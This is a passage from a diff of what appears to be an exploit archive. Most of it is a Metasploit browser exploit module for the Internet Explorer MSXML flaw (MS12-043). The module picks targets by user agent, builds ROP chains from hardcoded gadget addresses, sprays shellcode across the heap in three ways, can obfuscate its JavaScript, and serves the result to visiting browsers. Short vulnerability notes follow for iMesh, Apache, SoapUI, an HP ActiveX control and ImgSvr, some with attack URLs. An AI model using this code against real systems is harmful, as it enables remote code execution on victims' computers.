], + [ 'OSVDB', '82873'], + [ 'MSB', 'MS12-043'], + [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2719615' ], + [ 'URL', 'http://www.zdnet.com/blog/security/state-sponsored-attackers-using-ie-zero-day-to-hijack-gmail-accounts/12462' ], + [ 'URL', 'http://hi.baidu.com/inking26/blog/item/9c2ab11c4784e5aa86d6b6c1.html' ], + [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities' ] + ], + 'Payload' => + { + 'BadChars' => "\x00", + 'Space' => 1024 + }, + 'DefaultOptions' => + { + 'ExitFunction' => "process", + 'InitialAutoRunScript' => 'migrate -f' + }, + 'Platform' => 'win', + 'Targets' => + [ + # msxml3.dll 8.90.1101.0 + [ 'Automatic', {} ], + [ + 'IE 6 on Windows XP SP3', + { + 'Offset' => '0x100', + 'Rop' => nil, + 'RandomHeap' => false + } + ], + [ + 'IE 7 on Windows XP SP3 / Vista SP2', + { + 'Offset' => '0x100', + 'Rop' => nil, + 'RandomHeap' => false + } + ], + [ + 'IE 8 on Windows XP SP3', + { + 'Rop' => :msvcrt, + 'RandomHeap' => false, + 'RopChainOffset' => '0x5f4', + 'Offset' => '0x0', + 'StackPivot' => 0x77c15ed5, # xchg eax, esp # ret # from msvcrt.dll + } + ], + [ + 'IE 8 with Java 6 on Windows XP SP3', + { + 'Rop' => :jre, + 'RandomHeap' => false, + 'RopChainOffset' => '0x5f4', + 'Offset' => '0x0', + 'StackPivot' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll + } + ], + [ + 'IE 8 with Java 6 on Windows 7 SP1/Vista SP2', + { + 'Rop' => :jre, + 'RandomHeap' => false, + 'RopChainOffset' => '0x5f4', + 'Offset' => '0x0', + 'StackPivot' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll + } + ], + [ + 'IE 9 with Java 6 on Windows 7 SP1', + { + 'Rop' => :jre, + 'RandomHeap' => true, + 'RopChainOffset' => 0x5FC, + 'Offset' => '0x0', + 'StackPivot' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll + } + ] + ], + 'Privileged' => false, + 'DisclosureDate' => "Jun 12 2012", + 'DefaultTarget' => 0)) - register_options( - [ - OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) - ], self.class) - end + register_options( + [ + OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) + ], self.class) + end - def get_target(agent) - #If the user is already specified by the user, we'll just use that - return target if target.name != 'Automatic' + def get_target(agent) + #If the user is already specified by the user, we'll just use that + return target if target.name != 'Automatic' - if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/ - return targets[1] #IE 6 on Windows XP SP3 - elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/ - return targets[2] #IE 7 on Windows XP SP3 - else - return nil - end - end + if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/ + return targets[1] #IE 6 on Windows XP SP3 + elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/ + return targets[2] #IE 7 on Windows XP SP3 + elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/ + return targets[2] #IE 7 on Windows Vista SP2 + elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/ + return targets[3] #IE 8 on Windows XP SP3 + elsif agent =~ /NT 6\.[01]/ and agent =~ /MSIE 8/ + return targets[5] #IE 8 on Windows 7 SP1/Vista SP2 + elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 9/ + return targets[6] #IE 9 on Windows 7 SP1 + else + return nil + end + end - def on_request_uri(cli, request) - agent = request.headers['User-Agent'] - my_target = get_target(agent) + def ret(t) + case t['Rop'] + when :msvcrt + return [ 0x77c4ec01 ].pack("V") # RETN (ROP NOP) # msvcrt.dll + when :jre + return [ 0x7c347f98 ].pack("V") # RETN (ROP NOP) # msvcr71.dll + end + end - # Avoid the attack if the victim doesn't have the same setup we're targeting - if my_target.nil? - print_error("#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}") - send_not_found(cli) - return - end + def popret(t) + case t['Rop'] + when :msvcrt + return [ 0x77c4ec00 ].pack("V") # POP EBP # RETN (ROP NOP) # msvcrt.dll + when :jre + return [ 0x7c376541 ].pack("V") # POP EBP # RETN (ROP NOP) # msvcr71.dll + end + end - # Set payload depending on target - p = payload.encoded + def get_rop_chain(t) + if t['RandomHeap'] + adjust = [ 0x0c0c0c0c ].pack("V") # heap isn't filled with pointers to 0x0c0c0c0c + adjust << ret(t) + else + adjust = ret(t) + end - js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) - js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch)) + adjust << popret(t) + adjust << [ t['StackPivot'] ].pack("V") + adjust << ret(t) * 4 # first call to a "ret" because there is a good gadget in the stack :) - js = <<-JS - var heap_obj = new heapLib.ie(0x20000); - var code = unescape("#{js_code}"); - var nops = unescape("#{js_nops}"); + # Both ROP chains generated by mona.py - See corelan.be + case t['Rop'] + when :msvcrt + print_status("Using msvcrt ROP") + rop = generate_rop_payload('msvcrt','',{'target'=>'xp', 'pivot'=>adjust}) - while (nops.length < 0x80000) nops += nops; - var offset = nops.substring(0, #{my_target['Offset']}); - var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); + else + print_status("Using JRE ROP") + rop = generate_rop_payload('java','',{'pivot'=>adjust}) + end - while (shellcode.length < 0x40000) shellcode += shellcode; - var block = shellcode.substring(0, (0x80000-6)/2); + return rop + end - heap_obj.gc(); + def get_easy_spray(t, js_code, js_nops) - for (var i=1; i < 0xa70; i++) { - heap_obj.alloc(block); - } + spray = <<-JS + var heap_obj = new heapLib.ie(0x20000); + var code = unescape("#{js_code}"); + var nops = unescape("#{js_nops}"); - JS + while (nops.length < 0x80000) nops += nops; - js = heaplib(js, {:noobfu => true}) + var offset = nops.substring(0, #{t['Offset']}); + var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); - if datastore['OBFUSCATE'] - js = ::Rex::Exploitation::JSObfu.new(js) - js.obfuscate - end + while (shellcode.length < 0x40000) shellcode += shellcode; + var block = shellcode.substring(0, (0x80000-6)/2); - object_id = rand_text_alpha(4) - html = <<-EOS - - - - - - - - - EOS + heap_obj.gc(); + for (var z=1; z < 0x230; z++) { + heap_obj.alloc(block); + } - html = html.gsub(/^\t/, '') + JS - print_status("#{cli.peerhost}:#{cli.peerport} - Sending html") - send_response(cli, html, {'Content-Type'=>'text/html'}) + return spray - end + end + + + def get_aligned_spray(t, js_rop, js_code, js_nops, js_90_nops) + + spray = <<-JS + + var heap_obj = new heapLib.ie(0x20000); + var code = unescape("#{js_code}"); + var nops = unescape("#{js_nops}"); + var nops_90 = unescape("#{js_90_nops}"); + var rop_chain = unescape("#{js_rop}"); + + while (nops.length < 0x80000) nops += nops; + while (nops_90.length < 0x80000) nops_90 += nops_90; + + var offset = nops.substring(0, #{t['Offset']}); + var nops_padding = nops.substring(0, #{t['RopChainOffset']}-code.length-offset.length); + var shellcode = offset + code + nops_padding + rop_chain + nops_90.substring(0, 0x800-code.length-nops_padding.length-rop_chain.length); + + + while (shellcode.length < 0x40000) shellcode += shellcode; + var block = shellcode.substring(0, (0x80000-6)/2); + + + heap_obj.gc(); + for (var z=1; z < 0x230; z++) { + heap_obj.alloc(block); + } + + JS + + return spray + + end + + # Spray published by corelanc0d3r + # Exploit writing tutorial part 11 : Heap Spraying Demystified + # See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/ + def get_random_spray(t, js_rop, js_code, js_90_nops) + + spray = <<-JS + + function randomblock(blocksize) + { + var theblock = ""; + for (var i = 0; i < blocksize; i++) + { + theblock += Math.floor(Math.random()*90)+10; + } + return theblock; + } + + function tounescape(block) + { + var blocklen = block.length; + var unescapestr = ""; + for (var i = 0; i < blocklen-1; i=i+4) + { + unescapestr += "%u" + block.substring(i,i+4); + } + return unescapestr; + } + + var heap_obj = new heapLib.ie(0x10000); + + var rop = unescape("#{js_rop}"); + var code = unescape("#{js_code}"); + var nops_90 = unescape("#{js_90_nops}"); + + while (nops_90.length < 0x80000) nops_90 += nops_90; + + var offset_length = #{t['RopChainOffset']}; + + for (var i=0; i < 0x1000; i++) { + var padding = unescape(tounescape(randomblock(0x1000))); + while (padding.length < 0x1000) padding+= padding; + var junk_offset = padding.substring(0, offset_length - code.length); + var single_sprayblock = code + junk_offset + rop + nops_90.substring(0, 0x800 - code.length - junk_offset.length - rop.length); + while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock; + sprayblock = single_sprayblock.substring(0, (0x40000-6)/2); + heap_obj.alloc(sprayblock); + } + + JS + + return spray + end + + def on_request_uri(cli, request) + agent = request.headers['User-Agent'] + my_target = get_target(agent) + + # Avoid the attack if the victim doesn't have the same setup we're targeting + if my_target.nil? + print_error("#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}") + send_not_found(cli) + return + end + + p = payload.encoded + js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch)) + js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch)) + js_90_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch)) + + + if not my_target['Rop'].nil? + js_rop = Rex::Text.to_unescape(get_rop_chain(my_target), Rex::Arch.endian(my_target.arch)) + end + + if my_target['RandomHeap'] + js = get_random_spray(my_target, js_rop, js_code, js_90_nops) + elsif not my_target['Rop'].nil? + js = get_aligned_spray(my_target, js_rop, js_code, js_nops, js_90_nops) + else + js = get_easy_spray(my_target, js_code, js_nops) + end + + js = heaplib(js, {:noobfu => true}) + + if datastore['OBFUSCATE'] + js = ::Rex::Exploitation::JSObfu.new(js) + js.obfuscate + end + + object_id = rand_text_alpha(4) + + html = <<-EOS + + + + + + + + + + EOS + + html = html.gsub(/^ {4}/, '') + + print_status("#{cli.peerhost}:#{cli.peerport} - Sending html") + send_response(cli, html, {'Content-Type'=>'text/html'}) + + end end =begin - -* Crash on Windows XP SP3 - msxml3.dll 8.90.1101.0 - (e34.358): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. diff --git a/platforms/windows/remote/30897.html b/platforms/windows/remote/30897.html new file mode 100755 index 000000000..fbbf7d229 --- /dev/null +++ b/platforms/windows/remote/30897.html @@ -0,0 +1,45 @@ +source: http://www.securityfocus.com/bid/26916/info + + +iMesh is prone to a code-execution vulnerability because the application fails to sanitize user-supplied data, which can lead to memory corruption. + +Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using an affected ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions. + +iMesh 7.1.0.37263 and prior versions are reported affected by this issue. + + + + + + diff --git a/platforms/windows/remote/30901.txt b/platforms/windows/remote/30901.txt new file mode 100755 index 000000000..6d30c8915 --- /dev/null +++ b/platforms/windows/remote/30901.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/26939/info + +Apache is prone to an information-disclosure vulnerability. + +This issue occurs because Apache fails to properly associate file extensions with the correct engines when handling specially crafted requests for files on Windows SMB shares. + +Attackers can leverage this issue to view arbitrary script files as plain text. Potentially sensitive information may be present in the script code. Information harvested could aid in further attacks. + +This issue affects Apache 2.2.6 when serving PHP files from a Windows SMB share; other versions may also be affected. + +NOTE: This issue may also occur when handling other filename extensions that use AddType directives to associate scripts or executables (e.g. '.cgi\', '.py\', '.rb\', etc.). + +http://www.example.com/winshare/info.php\ \ No newline at end of file diff --git a/platforms/windows/remote/30908.txt b/platforms/windows/remote/30908.txt new file mode 100755 index 000000000..299fba910 --- /dev/null +++ b/platforms/windows/remote/30908.txt @@ -0,0 +1,125 @@ +# Exploit Title: SoapUI Remote Code Execution +# Date: 25.12.13 +# Exploit Author: Barak Tawily +# Vendor Homepage: http://www.soapui.org/ +# Software Link: + +http://www.soapui.org/Downloads/download-soapui-pro-trial.html +# Version: vulnerable before 4.6.4 +# Tested on: Windows, should work at Linux as well +# CVE : CVE-2014-1202 + + + +Hey guys. + +My name is Barak Tawily, I work for Appsec-Labs as information security +researcher. + +I have been found remote code execution vulnerability in the SoapUI product, +which allows me to execute a java code to the victim's computer via +malicious WSDL/WADL file. + +This vulnerability allows attacker to execute java code to any client's +machine that will use my WSDL file and will try to send request to the +remote server. + +SoapUI allows the client execute code by entering a java code inside the +following tag, the java code will be executed when the client will try to +send request to the server: + +${=JAVA CODE}; + +Thus, an attacker can make a malicious WSDL file, determine a malicious java +code as default value in one of the requests parameters, hence, when client +uses malicious WSDL file and will try to send a request the java code will +be executed. + +The attack flow is: + +1. The attacker makes a malicious web service with fake WSDL including +the java payload that will be executed on the victim. + +2. The victim enters the soapUI program and will enter the malicious +WSDL address. + +3. The victim decides to send a request to the server, and the java +code executed on the victim's machine. + +4. The attacker succeed execute java code in the victim's machine, and +will take over it. + +This vulnerability was check on the version (4.6.3), a proof of concept +video can be found at: http://www.youtube.com/watch?v=3lCLE64rsc0 + +malicious WSDL is attached. + +Please let me know if the vulnerability is about to publish + +Thanks, Barak. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + My first service + + + + + + \ No newline at end of file diff --git a/platforms/windows/remote/30920.html b/platforms/windows/remote/30920.html new file mode 100755 index 000000000..d5e278705 --- /dev/null +++ b/platforms/windows/remote/30920.html @@ -0,0 +1,26 @@ +source: http://www.securityfocus.com/bid/26967/info + +The HP eSupportDiagnostics ActiveX control is prone to multiple information-disclosure vulnerabilities. + +An attacker can exploit these issues by enticing an unsuspecting victim to visit a malicious HTML page. + +Successfully exploiting these issues allows remote attackers to obtain the contents of arbitrary files and registry values. Information harvested may aid in further attacks. + +These issues affect 'hpediag.dll' 1.0.11.0; other versions may also be affected. + + + + + + + + + + + diff --git a/platforms/windows/remote/30939.txt b/platforms/windows/remote/30939.txt new file mode 100755 index 000000000..28423cba9 --- /dev/null +++ b/platforms/windows/remote/30939.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/27033/info + +ImgSvr is prone to a remote script-execution vulnerability because it fails to adequately sanitize user-supplied input. + +Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +This issue affects ImgSvr 0.6.21; other versions may also be vulnerable. + +http://www.example.com/../[code] \ No newline at end of file